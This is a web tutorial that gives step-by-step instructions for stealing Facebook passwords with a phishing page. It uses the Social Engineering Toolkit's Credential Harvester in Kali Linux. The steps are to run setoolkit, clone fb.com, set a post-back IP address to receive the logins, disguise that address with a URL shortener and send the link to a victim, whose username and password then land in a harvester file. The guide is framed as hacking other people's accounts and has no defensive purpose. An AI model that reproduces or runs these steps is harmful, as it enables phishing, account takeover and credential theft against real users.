Home / Linux / How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

Follow this video……….


1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.


                    root@kali~# setoolkit

3. Enter ‘y’ to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                ‘1’ (Social Engineering Attacks) then  

                ‘2’(Website Attack Vectors) then

                ‘3’(Credential Harvester Attack) then

5. Type ‘2’ (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)


          set:webattack>Enter the url to clone: www.fb.com


6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

If there’s something that isn’t clear then there’s a 3 post series which covers this method in detail-

Leave a Reply

Your email address will not be published. Required fields are marked *


This site uses Akismet to reduce spam. Learn how your comment data is processed.


Check Also

TLS Security 5: Establishing a TLS Connection

TLS Security 4: SSL/TLS Certificates

When you communicate securely with a third party using data encryption, you usually want to ...